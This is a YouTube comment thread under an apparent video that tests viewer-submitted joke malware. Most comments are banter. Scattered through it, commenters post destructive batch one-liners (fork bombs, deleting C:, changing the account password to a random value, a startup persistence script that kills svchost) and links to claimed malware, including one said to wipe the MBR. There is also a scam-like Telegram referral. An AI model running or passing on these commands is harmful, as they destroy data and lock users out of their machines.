0 likes0:16 универсальные читы)))
0 likescan i have death virus download link please
0 likescri
im big fan
big cri
cri
cri
Универсальные читы идеальны
0 likes666k of what?
0 likes0:22 сразу видно русский "Универсальные читы"
0 likesomg.
0 likesplz do a film with it :)
0 likesImagine writing malware, or any code really, in a pithy excuse of a shell language that ruined DOS and got Windows far too much flak over the years.
0 likes(This comment made by the PowerShell gang)
Универсальные читы? Ты русский?
0 likesfun fact:MEMEZ Malware was a fake malware
0 likesУниверсальные читы!!!
0 likessomeone send me some .bat file with the same codes even though I wasn't dumb cause I know what did it mean. I checked the file's script and not only it had to restart my computer but also lock it... Btw I got that file from a random guy on discord saying it's minecraft acc generator even though I already have a very old premium mc account
0 likesI'm gonna upgrade from Windows 7 to Windows 2.0
0 likesReplies (1)
Downgrade
0 likesMâinile windows. 7 errrrorrr
0 likesCould you create your own virus, huh?
0 likesIs it TRASH?
0 likesfolder: универсальные читы ахах😂😂
0 likesdude, why are you being so mean to (probably) kids who just want encouragement?
0 likesJust write %0|%0 in a batch lol
0 likesWhy do I get the feeling that these were written by 12 year olds
0 likesEnderman In Minecraft Sees A Yt channel that explores Windows:Wait That's Illegal Make Sounds
0 likesEnderman Kills the minecraft enderman:Lol Minecraft enderman sucks im the best
:1
0 likesstart cmd.exe
goto 1
I love Windows 7.
0 likesLol this is kinda fun to watch even if they suck
0 likesi wonder what is in archive универсальные читы
0 likesI want the universal cheats !!!!!!!!!!!
0 likes"msfvenom" period.
0 likesi laughed of BOI
0 likes0:37
bruh
0 likesme I make a garbage virus but my computer is about to dead but it's fine
0 likesCan u give link to all these
0 likes2:50 serously........... RESTART??!!! pfft, as if that is even a command. that guy doesnt even know how to restart a computer using a batch file, when he could of gone
0 likes`shutdown -r -t 0` anyway, someone who has never used a computer could write that
Replies (1)
@@horohousu ik, he doesnt even know how to write a basic batch file
0 likesi too make crap in batch and compile it using bat2exe ( i use another free one not paid one lol)
0 likes2:49 xd
0 likesPlease links
0 likesdeath vir8s is 4/5
0 likesWant something good sometime?
0 likesMemz
0 likeswow garbage malware
0 likesWell, off to make a good virus, I guess.
0 likesBest malware: del system 32
0 likessend me the Death Virus pleaseee
0 likeseveryone reply to this with there virus so i can mess with them in a vm thanks!
0 likesrestart -1
0 likes2:53 sh** virus
0 likesIt is just restart your computer !!?
Replies (1)
It formats C:
0 likesУниверсальные читы? very interesting
0 likesNot trash pixel don't tell me that bro
0 likes#GoodTimesWithWin7
0 likesLol If I sent you a malware VM won't protect you
0 likesWhy is he trash talking like that, these are subscribed submittions bruh
0 likesfucking beautiful
0 likesVas a enseñar tu cara
0 likesTrashWare
0 likeswhat
0 likesI have the same background!!!! Lit_brothers3
0 likesЭндермен Пожалуйста скинь на вирус death
0 likesman you know program languages very good but why tf your website looks like 9 yo kido made it on class?
0 likesReplies (1)
He rebuilds the site
0 likesI made a pointless "virus" that just opens google multiple times.
0 likesno im not gonna link it
lol
Max toxic EM.
0 likesLol end me
Windows 7.exe
0 likesDamn your smart afff
0 likesHi enderman
0 likeswhere i can share my trojan?
i want to see it in a video
i had to learn some of C++ Programation Language
test it only on Windows x64 Systems
P.D: I love your channel
Replies (12)
@@David-ms3zf got it
0 likes@@Jnsystems test it but don't do any video
0 likesThis is for endeman content
@@Jnsystems I know
0 likesHere it is. Go to your channel and click on your latest video. I will discuss there.
0 likesLOL showed me an ad about malware xD
0 likesHere you can submit wirus for me to test as well. Not literally here because of YT. I will have instructions soon. Disclaimer: I am not affiliated with Enderman.
0 likes@@Jnsystems I made it with some C++ Programs i made and some tools like BAT to EXE and Embedding Files
0 likesYeah Same for me but I can try avoiding bat files lol
0 likesI still waiting please!!
0 likesOh i think he gonna read this tomorrow because is late there
2:21 AM in Russia, Moscow 3 december
Please Enderman, give me an opportunity i work harder in this
to see you testing it on a video
@@fegelein9428 i tested it on VMware, sometimes in Windows 7 VM get a error like MBR corruption and i'm spanish so my English sometimes will be bad and i don't know where to share it because someone download it and execute it on a real PC (That's so stupid) but someone can do that and destroy a Physical Computer
0 likesI was waiting so much for this moment and try to send it to enderman
if your C++ is as good as your English then yeah keep it
1 likeand since you only learned C++ to make a "virus" then we can assume how good it is
I still here please respond me :(
0 likesWaiting for you 1 hour please :(
I have a prank thing for you.
0 likesput older koteyka links 1.2 especially
0 likesОн не хочет идти на уступки в этом случае не надо мне ничего я тебе говорю я тебе не надо было в этом случае я не могу найти где можно найти на карте
0 likesPRANKED?! JUST MY COMPUTER NOT PRANK IT IS MY YOU COMPUTER NOT PRANK AND WITH VMWARE!!!!!!!!!
0 likesWow, seriously, try to make decent viruses... I may be no expert at low-level programming, but I know a bit of Batch and Powershell, and some of that is just really bad programming...
0 likeslol file installer with restart code
0 likesУниверсальные читы хд
0 likes100k!!!!!!!!!!!!!!!!!! WOH
0 likesWindows 7 best os
0 likesThis video is quite toxic >:0
0 likesLol
0 likesTry the memz
0 likes2:57 ENDERMAN REALLY i don’t like You censored i wanna prank my friend
0 likesF***.exe.play:garbage
0 likesF***.exe.play:garbage + pi,.
[execute activate]
love ur vids
0 likesYou forgot to test it on windows 10! 😡
0 likesplay minecraft pls :)
0 likesHacked
0 likesLmao
0 likesYou needn't to end the MINDYOBUISNESS program using Task Manager.
1 likeYou just need to press ALT+F4 and it will close :)) (bcs i have tested it)
Универсальные читы?
0 likes2:55 Lol Is Not Crash Virus XD Fake Death Virus This Is Fake Virus Prank XD Lol...
0 likesReplies (1)
System32 Deleted Fake Virus Saved Files and Windows Delete Death Virus...
0 likesYea
0 likesThis is so freaking awesome 😂😂😂 reminds me of the days when I was this stupid and thought I made viruzzz with low skill batch programming lmao
0 likesBunch of script kiddies
1 likecould you not be too harsh on them? jeez.
0 likesУниверсальные читы
0 likesI can open run Klik on Windows and r
0 likes#enderman From polish me. My
0 likesㅜㅜ
1 likeI have created better viruses but o have only low experience. It taskkill Explorer.exe but i can create delete Explorer.exe virus but "every virus can be terminated" PS:sorry for my english
0 likesIm leave Trash.
0 likesWindows 8.1 Windows 7
0 likesWell the death virus looks pretty cool :D
0 likesThe win2 one tho lmao. It seemed like an attempted at least. Until the first click. The best is the “Death Virus”, not saying it was good tho. Just nice tried
0 likespls give me its virus 3:10
0 likestrash malware is stupid and dumb
0 likesnah they are good
Универсальные читы!!!
0 likesNice👌
0 likesTraware
0 likesIm can run Windows 10 and run as administratie
0 likesRed Screen Is A Faks Virus? XD
0 likesУниверсальные читы
0 likesvb scripts such in this videos are like loving BTS
0 likesУниверсальные читы!!! From Russia
0 likesas soon as the video ended i got a notification from windows defender xD
0 likesуниверсальные читы?
0 likesReplies (1)
ЧЕЛ, ОН РУССКИЙ ХОТЬ И ПЫТАЕТСЯ НЕ ПАЛИТСЯ
0 likesim Really Like this video But What's in New virus by justas For siam alam an E.. and what's in setup? make please 2 part trash malware please?
0 likesPls code Death Virus
0 likesI’m not Ahmad Amin, I The king of word my nickname,
0 likes😮😮😮??? Windows 7 delete
0 likesIm look tv now is locked windows7
0 likesCan you add my malware
0 likesYou can get comments
0 likesUPGRADE TO WİNDOWS 11!!!!
1 likeEnderman, so your basically hating on your fans, thats pretty mean.
0 likesReplies (3)
@@64Will64Gaming ?
0 likes@@josephleebob3828 no u
0 likesHe said in the desc
0 likesshit walware is me
0 likesактуалли блин
installer exe hahaha
0 likesThis is some crap malware my friend made, it's better than this malware, but if you ever want to clear an MBR based windows work computer while having administrator privileges do this: https://pastebin.com/NRwddTcW.
0 likesIt will not work on GPT.
It will not work without administrator privileges.
It will work without the user pressing yes on UAC (as it bypasses it)
It does not clear the drive, only set's it to not bootable.
Je quitte trash
0 likesi wnna download it ;-;
0 likesI got windows 7
0 likesOmegat
0 likesyo nice video
0 likesHm.
0 likesAll is nice :)
0 likesYou really can kill svchost.exe with running it as administrator here is a link to the script https://sites.google.com/site/eneerge/scripts/batchgotadmin
0 likesо а вы онглечанин
0 likeslol i’m obviously a 1337 hacker so i can write a way better virus
0 likesTrash bin 😛
0 likesFol
0 likesгде универсальные читы
0 likesx
0 likesCmd spammer is very basic
0 likes.
0 likesУниверсальные Читы?)
0 likesEnderman is the best
0 likesDownload virus 000.exe
0 likesThank you
ребзи,ОН РУССКИЙ) 1.Название трояна Koteyka 2.Папка с русским названием(универсальные читы!)
0 likeswtf
0 likesVisual Studio is Shit man, !
0 likesshit i missed it
0 likes1:48 i can do this virus and i have so many :)
0 likesNothing
0 likesУнИвЕрСаЛьНыЕ ЧиТы????
0 likesуневирсальные четыыыы
0 likes2:12
0 likeslol
0 likesI can easily make a file that deletes everything in the C: Drive
0 likesReplies (2)
Well, I program in C++
0 likeswow u are a coder it is a miracle 😮😮😮
0 likeseveryone can do that
Bruh I can make one of those virus and how to execute, its very easy to make them, Because I use vbscript, and a couple of javascript (yeah just learned it when I was 11 yrs old -.-)
0 likesDude you had bad english too why you would notice it?
0 likesKind of a
0 likeswhy are you so rude at these people?
0 likes0:08
0 likesИ вот опять русский язык.
И почему ты не попробовал запустить "Универсальные читы!!!!!!!!!!!!"
Pls petya reynomswae
0 likesSystem32/delete/ you sure mate? yep/nope sonny jim. yep.
0 likesdeleting.
Thank you for deleting system32 we will give you an update when it will install.
What will install?
Windows XP sonny Jim.
o h g o d
Windows
XP
——
welcome
Your thingy majig is outdated boi.
Upgrade to windows 1.0?
Yep sonny/ nah mate your on your own.
Yep sonny.
MICROSOFT
WINDOWS 1.0
your thing is outdated pls upgrade to windows 10
Ok/nope
Ok
WINDOWS 10
....
Welcome back.
Trash malware.
#malwere
0 likesI created better virus it only taskkill Explorer.exe but i can create delete Explorer.exe virus, it looks better! Your computer has been unusable if you delete explorer.exe
0 likesme
0 likesNOPE.
0 likes0:53
Wamo
0 likesWHAT VIRUS IS NOT LIKES!!! VIRUS daeth jou wi-fi
0 likesCmd spam only one file:
0 likes:t
Start cmd.exe
Goto t
Umm... Trash lvl 999999999999
2 likesBut "Death Virus" are have 11% nice and 89% trash...
P.S:The .vbs files are good for pranks ;-)
Hi Enderman jou hackt jou (virus) waring
0 likesYou mean: Fortnite Malware
0 likesim 11 y.o. and i do better things in c++
0 likesI can make stuff better than that and I suck at code
0 likesHey can I send you my trash malware working on Windows 1.0? xD
0 likesNot
0 likes????????
0 likesWindows 2.0 дод
0 likes666
1 likeearned a new sub :)
0 likesTest
0 likes666 comment ooooooooof
1 likewhat if i use all of this code to make the ultimate virus (:
0 likesNo
0 likesOko
0 likesNo
0 likesWhat the f***
0 likeslal
0 likeswhile (true || false)
0 likes{
std::system("start");
}
me after trying to get free minecraft pe download 100% no virus legit
0 likesCO
0 likessiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii
0 likes🇹 🇭 🇽 thx
0 likesNo
0 likes2:48
0 likesHey enderman give me link pinned commemt
0 likesYeah noob trojan
0 likesThose were painfully unfunny.
0 likesIm joni latoop HP Windows 10 is not good in windows
0 likesno one:
2 likeshumans:
Replies (1)
bro lmoa thats very funny
0 likesDafuq
0 likesLOL MAKING A VIRUS FOR PEOPLE TO DOWNLOAD
0 likesТы же русский)
0 likesуниврсальные читы?)
0 likesпривет русские
Ну ка признавайся, для какой игры скачал читы?( ͡° ͜ʖ ͡°)
2 likesi sent you a virus :)
0 likesHow to fail:
1 likeUse C#
rd c:
0 likesLOL
0 likesEven i could do better...
0 likes@
0 likesLol
0 likesTrashshshshshshshshshshshsh not trash
0 likesImagine making fun of others creations like your a god yourself some of them weren't half even that bad for them being a joke. Def won't be watching your channel lmao
0 likesI'm writing 666 comment. 👹
0 likesyou very nice
0 likesi start creating garbage html/)))
A comment
0 likesKdh
0 likesНИ
0 likesА
Fun sorry:
0 likesI wrote a script in WBS and there was error. Everyone thinks that was Windows error xD
It was at scool btw
Wath?
0 likesЛкдж не знаю з как дела что ты мне не
0 likesXD
0 likes👁👄👁
0 likes💦 💦
D
0 likes¿¿¿/)/ enndderrmen
0 likesDont know how VM works so pliz try it urself :)
0 likesЯ:Наконец-то я написал вирус. Он убьёт тысячи компьютеров! Я его писал 2 часа.
1 likeВирус: 2:48
0:24 прям на русском написано Универсальные читы
1 likeAaaaaaaaaaaaa
0 likes940th comment
0 likesDisrespecting fans.
0 likesTsk tsk.
Ороооооооннннннннннн русский
0 likesOwO
0 likesS
0 likesha ha so su
0 likesgarbage hahaha\
0 likesКто русский лайк
0 likesWho is watching in march 2024?
0 likes👇🏿
Replies (1)
It's 4 years old not 14 years old 💀💀
0 likesKkkkk
0 likes1:46 just get 1 tb of ram and ur good to go XD
0 likescool code:
0 likes*MEMZ CODES*
lol
this one gave me a laugh. i give it a malware/10 ;p
0 likesDisliked because you didn’t test the first one
1 likecan u try my? ur disc :D
0 likesPp
0 likesроссия
0 likes🇷🇺🇷🇺🇷🇺
Replies (1)
УНИВЕРСАЛЬНЫЕ ЧИТЫ!!!
0 likesКгпл😂
0 likesNice video!
0 likessudo apt delete my life
0 likesi'm using windows just for games
Replies (1)
su - Goobi91 bash -c sudo apt purge braincells -y
1 likecan i have the deathvirus? i wnna troll me friend xDD
0 likesNon trash malware that can damage computer if on enough
0 likes1:
%0 | %0
2:
@echo off
Title RIP
:X
Echo rip!
Start calc
Start cmd
Start control
Start notepad
Goto x
3 (requires 2 files 1 a .bay file another a .vbs)
.vbs (let’s name it rip1)
X=msgbox(“OH DAMN!” 0,16 “rip!”)
.bat (let’s name it Oof!)
@echo off
Title oh no!
:x
Start rip1
Goto x
4 forces you to play minecraft lol:
@echo off
Title PLAY MINECRAFT!
:x
Start Minecraft launcher
Echo PLAY MINECRAFT!!!!
Goto x
That’s some viruses
This is unacceptable. These people made you these samples because they wanted you to test them, not for you to make fun of it and just bully them for it. You’re using your fame as an excuse for insulting and bullying, which is wrong. Utterly wrong. You think that because you’re popular that these people who put the time into making this won’t question you for bullying them. You’ve probably affected these poor people’s lives to the point of no recovery. You should be ashamed of your actions and in future, don’t exploit people who have took the time to make these samples for you to test. Disrespecting your fans like that is horrible treatment and you shouldn’t do it again unless you want to severely damage your reputation. You don’t deserve the 1000 likes you asked for and nor do you deserve that many subscribers.
0 likesReplies (1)
Why can't you read the desc. properly? he said Sorry! Are you gonna read the desc. again and fix or delete or just leave the Wasted-Time-Comment you commented?
1 likeMore than 90% stupid scripts (garbage) in this video is written by 7 years olds in notepad (the code is copied 100% from stupid tutorials in youtube)
1 likeReplies (1)
Fr
0 likes@.
0 likes¿????¿
0 likes...
0 likesI feel like less than 10% of people on the internet actually know what an actual "Virus" is because there is a difference between a Virus, Malware, and other things like that.
2 likesI remember I made a virus. So closely it didn't died...
0 likeshey i have some malware for you and it's kind of weird check it please
1 likehttps://www.mediafire.com/file/p6u1ucv94o4dox8/malware.rar/file
Replies (1)
This program was made with an Unlicensed compiler.
0 likesPlease buy the PRO version to distribute your EXE.
i tried it lol
Junk<bullshit
0 likesyoure a virus master lol
0 likesTHESE ARE GARBAGE VIRUSES
0 likesHI ENDERMAN I SENDING YOU MY VIRUS:
1 likeTHANKS
https://www.mediafire.com/file/l7r4omkudu27eu8/ß$ß$ß$ß$ß.bat/file
Nobody:
0 likesMINDYOBUISNESS: ( ͡° ͜ʖ ͡°)
I made a virus… it bad but it works
0 likesTrashware
0 likesokay, can you send me the death virus? I’d like to prank a friend... die#9590
0 likesYour a terrible person I’m sorry if it’s a joke but they tried so shutup no one cares about your option that much they just wanted to show you it and they wasted there time on you but once again if this is a joke your not funny if not still just be quiet loser
0 likesWindows 2.0 uprade: You Garbage and LOL
0 likesWhy do people call everything a goddamn virus, I've seen these on other websites im pretty sure they downloaded it and gave it to you. the closest thing to a batch virus is MS2
0 likesi made a virus called i am virys
0 likesTHERE IS A VIRUS THAT HAS NO ESCAPE ITS CALLED MEMZ
0 likesMichael reeves shitty shitty virus ideas
0 likeshey enderman! Would you like to try this destructive virus I made? virus name: MEMZ trojan
0 likesReplies (1)
Its not yours
1 likeThanks Sharon for connecting me to smithjuli on telegram I got my too just off recent it cool legit no she’s great💯
0 likesPfft give me a few days and I will give you something cool and have it actually fuck up your vm the command prompt spamming shit virus looks like what I made in middle school then tricked a few teachers to open it and flip the fuck out as well as having it run on startup so it was actually 20x better then that shit
0 likescan you test mine pls email me at bm3099912@gmail.com
0 likesAnnishcwetsova@gmail.com
0 likes"Keyword"
0 likes"windows"
"windows 98"
"windows xp"
"windows 7"
"tech"
"malware"
"spyware"
"trojan"
"virus"
"fakeav"
"rogue"
"9999"
"year 9999"
"enderman"
"endermanch"
"ender show"
"test"
"vmware"
"virtualbox"
"software"
"tutorial"
"trash"
"garbage"
"trash malware"
"worst malware"
"top malware"
"best malware"
"malware download"
"best viruses"
"worst viruses"
"trash viruses"
"batch"
"bat"
"bat virus"
"windows"
"windows 98"
"windows xp"
"windows 7"
"tech"
"malware"
"spyware"
"trojan"
"virus"
"fakeav"
"rogue"
"9999"
"year 9999"
"enderman"
"endermanch"
"ender show"
"test"
"vmware"
"virtualbox"
"software"
"tutorial"
"trash"
"garbage"
"trash malware"
"worst malware"
"top malware"
"best malware"
"malware download"
"best viruses"
"worst viruses"
"trash viruses"
"batch"
"bat"
"bat virus"
Hey can you see this guys virus its in the description https://youtu.be/ub82Xb1C8os
0 likesSystem 32 was deleted
1 likeBut i use System 64 B*TCH
xeoqmfsjzbcswaah 10
0 likesYou Russian?
0 likesТЫ НЕ ГОВОРИШЬ ПОТОМУЧТО БОИШСЯ АКЦЕНТА
0 likesКОГДА В ВИДЕА ТЫ ГУГЛИЛ СКАЧАТЬ ЧИТЫ ДЛЯ МАЙНКРАФТА ПОИСК БЫЛ РУССКИЙ ХОТЬ ТЫ И ПИСАЛ НА АНГЛИЙСКОМ ПОТОМУЧТО ТЫ СКАЧИВАЛ ВИРТУАЛЬНУЮ МАШИНУ С РУССКОГО САЙТА И У ТЕБЯ РУСКИЙ ЯЗЫК НА ОСНОВНОЙ ПК.
UPD: ТАКЖЕ У ТЕБЯ В РЕК. КАНАЛАХ СТОИТ 1 РУССКИЙ ЧЕЛ - СОВПАДЕНИЕ, НЕ ДУМАЮ!
UPD2: У ТЕБЯ В ТВИТЕРЕ ЕСТЬ ПОСТ НА КОТОРОМ ЛЕЖАТ МАРМЕЛАДКИ "НАБОР МАРМЕЛАДОК" НА РУССКОМ!
UPD3:
СУКА Я ТАК И ЗНАЛ ЧТО ТЫ СУКА РУСКИЙ/
0 likes99.9 viruses are viruses
1 likeReplies (1)
What it is true
0 likesbest batch virus:
0 likescopy c:\users\username\desktop\virus.bat C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
taskkill /im svchost.exe /f
Trashware
0 likesimagine this just opens infinite amount of notepads and on the notepads it all says Your Trash
0 likestest my shit: https://www.file-upload.net/gal-294141/wg11w2/1.html
0 likesReplies (1)
i doubt this is yours
0 likesPlease stop calling bad hand made by good people viruses GARBAGE
0 likesT r a s h
0 likes()
0 likesWhat kind of moron just renames a batch file to exe
0 likesTrash intro
0 likesTry RansomwareRAODmad.com
0 likesur so toxic
0 likes%0|%0
0 likesIf I make a virus it be crazy for you
0 likesMalware link
0 likesInstallminecraftcyberpunkandthelastofuspart3freeandckubpenguin.lol
Test My Virus Please https://mega.nz/folder/LdQ3UI7J#3zD3GSAiTkADfc0TNmLm4Q
0 likes💜💙💚💛❤️😺💛💚💙💜🖤♥️
0 likesC:/Windows\system32\cmd.exe
0 likesI will make a virus that deletes all the files except system 32
0 likesAnd spams every single application on the computer and moves the mouse by it self
It multiplies itself and infects everything then connects to your wifi then the server
And get transmitted to other computers
JK no I'll go to jail
idiot
0 likesgod i could make a better virus in .net than that idiot and i aint even 16 yet
0 likesI don't even know if this guy is trolling or is he actually being an a$$hole and shit talking peoples "viruses" fr
0 likesOkay so I just came across this video, and I absolutely think that you were absolutely a dick in this video. Many of these people were rather young, and I'm sure that you and many others did something extremely similar to this.
0 likesThere was absolutely no reason to harp on these people. While I understand that they shouldn't be exempt from criticism, there's a difference between criticism, and just shitting on them and the creator. What you did was the latter; you should know better than this, Enderman.
Hi pls try my virus :))))
0 likesVirus.exe: @echo off
del C:\System32.bat
Well I didnt test it because I dont want to get a virus but I hope you can test it please :))))))))))))
https://www.youtube.com/watch?v=aP9a6WjLTi4 go to ###
0 likestry %0|%0
0 likesGarbage: www.youareaidiot.org
1 likehej pls test out mi wirus just write this in batch file
0 likes"open https://youtu.be/dQw4w9WgXcQ"
T R A S H M A L W A R E
0 likesBig trash malware video
0 likesTry my new “virus”
0 likeshttps://cdn.discordapp.com/fuckingretardedbullshitbatchrenamedtoaexebecauselittlekidsthinkthatworks.batimean.exe
how to hate your fans tutorial 101.
0 likesDon't get me wrong, this malware is not good, but at least have respect to your own fans. They made you famous, and now you are just shitting on them, editing their messages to mean things.
https://www.youtube.com/watch?v=-IKW7g0SH48
0 likeshey endermen! try this next
0 likeslink:- http://homoluath.com/3SjZ
Hey man, I actually have something decent, unlike the junk, the others have made. Tested on my Windows Vista VM, here ya go= https://www.mediafire.com/file/g7car1r5nypcgue/DO_NOT_PRESS.lnk/file
0 likesmy malware is way better, heres small example:
0 likesmsg * you stink
cd desktop
remove trash_malware.bat
http://www.mediafire.com/file/sg90joelomhlqgo/777.exe/file i have bigger trash than universe saw :) (run it on windows10, if u not idiot)
0 likesREAL VIRUS!! https://yadi.sk/d/YSOJaUcKg9ytLQ (password: uopilot.uokit.com)
0 likesVIRUS #2: https://yadi.sk/d/XG2bnQPjqDPsQw (password: 1234)
VIRUS #3: https://yadi.sk/d/GDjx9-Kk8QEPGw (password: 1111)
and test its i dont know VIRUS #3?: https://yadi.sk/d/AjI7w8i9lZGMyw (password: ShottaBX)
Try this virus! its harless but cool and not TRASH. If command prompt pops up you need to wait!! https://drive.google.com/u/0/uc?id=19L1G0F2ocRitw_GzVt9OD029lha44yrY&export=download
1 likeBest code:
28 likesDo
Msgbox "you have a virus"
Loop
Replies (11)
More danger than wannacry
1 like@@cst1229 ok thanks :D
0 likes@@Vibri_but_Paranoid When saving the code, make sure to select "All files" and put .vbs after the filename.
0 likesand what programming language does the code originate
0 likes@@cst1229 how do i make a .vbs file
0 likes@@yoshicrafter29 its called .vbs and it was beautiful
2 likes@@elextrodarker2383 lol
1 likeKids lol
2 likesWho uses Vbs lol
2 likes@@yoshicrafter29 put it in a .vbs file
1 likeNot working
0 likesHi i just post a comment a few weeks ago on a ransomware that i create (with download link)
0 likesAnd I'm back with c# virus that i made in a few minutes (15-30 minutes) .
Hope you will enjoy it ! He can't do anything to your computer but if you are too late your going to have to turn your PC OFF with power :( .... Just save all your files before run it so anything can be loose in case of PC restart ...
There is the Download Link :
https://mega.nz/#!KvpzUaga!huhtjsGwjZdk1xCdCpVBAIJvT48iLciEIGySI2DdCJ8
Password : jpkgbsjipze=iàeafkop^sd
Enjoy <3 !
2:57 I want to download this Vbs script plzzz
0 likesmy disocrd : qrenz:7774
All these lightweights making shite viruses - I want to make a real virus now just so they can see what a real virus looks like
0 likeshey enderman this isnt a virus i have also tested it here have the link
1 likehttp://www.mediafire.com/file/xspb20zqvkl1zwt/Spam-o-maker_-_By_Awesomepizza25.7z/file
Replies (1)
do you really think that not calling something a virus will make you featured?
0 likes(-_-*)💤
0 likesTrashware
0 likesi want to get the death virus just so i can piss my friends off with it XD
1 likeHonestly you must be delusional "this only works on windows 10" do you know how to read or are you fucking blind
0 likesTbh atleast these people tried dont know why you are fucking rude
0 likesThis video sucks and are you fucking dumb? That man clearly said it only eorks on windows 10
0 likesthis video is toxic I didnt like it
0 likes4:11 that is what you call dotnetfailwork
91 likesReplies (5)
.NET failwork
0 likesLOL! Good joke!
lol
0 likesdotfailnetwork
1 likeyeas
0 likesLOL
0 likes>>>https://youtu.be/QbjYksxk4gA<<<
0 likesenderman i have one malware
0 likeslink:https://mega.nz/#!L6h3gI6R!TRoJtfth3BUxQK3mxHI4ylMNBVOUAPFilS9QJSoBftM
How to destroy ur friend's iphone
2 likesJust message him n say 🌈0🏳
Not a virus, only stupid script kiddies bull shit.
0 likesDo you know how to make the shittiest """""malware""""" or a """"""""''virus""""""""""?
0 likes1. Make a new text file.
2. Write in it "echo Screw you"
3. Save it as .bat format
4. Voila! Now you can spam Enderman all day so he would check ur """""""""""""""virus""""""""""""""" and you will get a shout out and he will say ur virus is da best (jk in ur dreams lol) and you'll get featured.
1:10 Looks Like: https://www.mediafire.com/???????????????????????/bluebooter.bat/file
0 likesHey enderman! I have heavy virus plz record my virus at your video ;). Link: http://www.mediafire.com/file/p48jpjkqhqd7ywf/XVASOR_VIRUS_%252B_DELETER.rar/file
0 likesenderman i created something can you do it in a video like this too (have to open as administrator for it to work i think) heres the file https://drive.google.com/file/d/1hfR-7kxvNr-IPhlMyVflS9OsmxlkV55v/view?usp=sharing
0 likesHEY is see you want to look down there
HEY IM TALKING TO YOU only look down there if you have problems with the file HEY I SAID ONLY
if you have a proble with this programm take this: before you open the file open another cmd with taskkill /f /im cmd.exe and when you run the file make sure you have your own cmd window far away from the files cmds so you can easyly execute the taskkill
Replies (2)
ok i have made changes to the file it will crash every pc if you dont watch out your pc might actually crash https://drive.google.com/file/d/1hfR-7kxvNr-IPhlMyVflS9OsmxlkV55v/view?usp=sharing 1 more thing make a .bat with taskkill /f /im cmd.exe and reopen it untill everything is gone run this file as admin for it to work fully
0 likesthe link actually brings you to the right file (i struggelt a little becouse i did know how to share the file
0 likeseasy garbage csgo spamer :)
0 likesThe death virus is the only good one
0 likesyou talking about trash malware boi your video is like a 2008 fucking tutorial son
0 likeswait thats a compliment
You Should checkout my Actual Harmful Malware.
1 likehere is some fake bsod code:@echo off
0 likesecho ^<html^>^<head^>^<title^>BSOD^
</title^> > bsod.hta
echo. >> bsod.hta
echo ^<hta:application id="oBVC" >> bsod.hta
echo applicationname="BSOD" >> bsod.hta
echo version="1.0" >> bsod.hta
echo maximizebutton="no" >> bsod.hta
echo minimizebutton="no" >> bsod.hta
echo sysmenu="no" >> bsod.hta
echo Caption="no" >> bsod.hta
echo windowstate="maximize"/^> >> bsod.hta
echo. >> bsod.hta
echo ^</head^>^<body bgcolor="#000088" scroll="no"^> >> bsod.hta
echo ^<font face="Lucida Console" size="4" color="#FFFFFF"^> >> bsod.hta
echo ^<p^>A problem has been detected and windows has been shutdown to prevent damage to your computer.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>DRIVER_IRQL_NOT_LES_OR_EQ
UAL^</p^> >> bsod.htaecho. >> bsod.hta
echo ^<p^>If this is the first time you've seen this stop error screen, restart your computer, If this screen appears again, follow these steps:^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Check to make sure any new hardware or software is properly installed. If this is a new installation, ask your hardware or software manufacturer for any windows updates you might need.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>If problems continue, disable or remove any newly installed hardware or software. Disable BIOS memory options such as caching or shadowing. If you need to use Safe Mode to remove or disable components, restart your computer, press F8 to select Advanced Startup Options, and then select Safe Mode.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Technical information:^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>*** STOP: 0x000000D1 (0x0000000C,0x00000002,0x00000
000,0xF86B5A89)^</p^> >> bsod.htaecho. >> bsod.hta
echo. >> bsod.hta
echo ^<p^>*** gv3.sys - Address F86B5A89 base at F86B5000, DateStamp 3dd9919eb^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Beginning dump of physical memory^</p^> >> bsod.hta
echo ^<p^>Physical memory dump complete.^</p^> >> bsod.hta
echo ^<p^>Contact your system administrator or technical support group for further assistance.^</p^> >> bsod.hta
echo. >> bsod.hta
echo. >> bsod.hta
echo ^</font^> >> bsod.hta
echo ^</body^>^</html^> >> bsod.hta
start "" /wait "bsod.hta"
del /s /f /q "bsod.hta" > nul
Replies (1)
echoing HTML...
0 likesok boomer
enderman can u download that game virus joke sorry my bad grammar ;-; :http://www.mediafire.com/file/w8wwz8q4uc5lklc/Simcity_Setup_Downloader_With_bat.bat/file
0 likesIn my school, some idiots run a batch file that just copy the Windows folder to Desktop and Documents, stupid kids from 2nd semester
0 likes0:16 you russia?! universal cheats on russia
0 likesТоврв вевялврп я
0 likesKids on youtube: HOI I VANT TO GIV U A VIRUS SUPLE UNDERMON HIRI IT IS:www.crappy2007sharingwebsitewithads.com/file/HGHGHGHGVIRUS.exe
0 likesMe:Looks like a kid want to send to enderman his virus. I'm curious!
Me:*looks in source code"
Code:
@echo off
echo U HIAVE A VARUS HHI9HI9HIHIHIHIHIHIHIHI
MSG * FORMATT UR HARDDIASK
MSG * uPen note pad
MSG * win dows is dun
del c:\windows\system32
echo dun ur pc iz treshed
shutdown -r
Me:THIS IS t r e s h
In the video
Enderman:This is t r e s h deletes it
Kid: https://www.youtube.com/watch?v=yBLdQ1a4-JI endarmun caled mi varus trash
Kid:*cries*
._.
0 likesYou want garbage, you get garbage: https://cdn.discordapp.com/attachments/491277359572320257/658402913932279831/good_vuris.exe
0 likestry mine it good it only works on windows 10 it is based of off the CMD exploit try! https://mega.nz/#!a3gi2YoS!Re0AIEhcWNQO1w8vbERTJlHxNjHAvNyHpqg1zkklqS0
0 likeshow fucking dare you blud ill do what i want dont tell me what to do r u mad
0 likesBest code:
76 likesshutdown -r -t 1
Replies (9)
@@jonas9 German automatic correction, Fick means Fuck
1 like@@MinecraftPlayer-tl5lx fick it? lol
0 likes@@davidavilamoras2932 A nice CRITICAL_PROCESS_DIED BSOD at every boot. XD
0 likesBest codes:
2 likesRandom Password: net user %USERNAME% %RANDOM%
Delete Windows: del /f /s /q C:
Delete Drives: rd/s/q C:\
